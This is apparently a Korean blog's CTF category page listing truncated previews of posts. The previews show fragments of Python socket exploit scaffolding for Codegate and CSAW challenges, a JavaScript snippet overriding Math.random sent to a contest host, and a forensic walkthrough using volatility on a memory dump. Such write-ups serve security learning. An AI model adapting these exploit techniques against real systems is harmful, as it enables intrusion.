본문 바로가기

CTF

2016 PCTF tonneree 200점 더보기
2016 codegate watermellon exploit only from socket import *from struct import *import sysimport time ################################def until(s, string): data = '' while string not in data: data += s.recv(1) return data def recvAll(s): while(True): data = s.recv(1024) if not data: break print(data)################################ p = lambda x:pack(' 더보기
2016 codegate JS_IS_NOT_A_JAIL exploit only from socket import *from struct import *import re host = '175.119.158.131'port = 1129 sock = socket(AF_INET, SOCK_STREAM)sock.connect((host, port))i=1 #20150303 a= "tmp =0; Math.random = function(){"a += "if(tmp==0){ var c = 0.23; }"a += "else if(tmp==1){ var c = 0.22; }"a += "else if(tmp==2){ var c = 0.24; }"a += "else if(tmp==3){ var c = 0.32; }"a += "else if(tmp==4){ var c = 0.22; }"a += "els.. 더보기
2015 Christmas CTF [FORENSIC] 100 do you want to~ 포렌식에 대한 기본지식이 없어 나온 Write up을 참조하여 풀이 하였다. 운영자가 준 압축 파일을 열면 for.mp4, mem.raw 파일이 있다. for.mp4 파일 안에는 .7z 파일이 숨겨 져 있고 .7z 파일을 추출하고 압축을 풀려고 하면 암호가 걸려 있는 것을 확인 할 수 있다. 암호를 알아내기 위해서 mem.raw를 volatility로 분석.( volatility는 칼리 리눅스에 깔려 있는 것을 사용했다. ) 1. python vol.py -f ./../../volatility/mem.raw imageinfo- 운영체제 정보를 확인 : WinXPSP2x86 2. python vol.py -f ./../../volatility/mem.raw pstree- 실행 중인 프로세스 확인 : Hwp.. 더보기
2015 CSAW CTF precision 100 exonly from socket import *from struct import *import time #####################################def until(s, string): data='' while string not in data: data += s.recv(1) return data##################################### p = lambda x: pack(' 더보기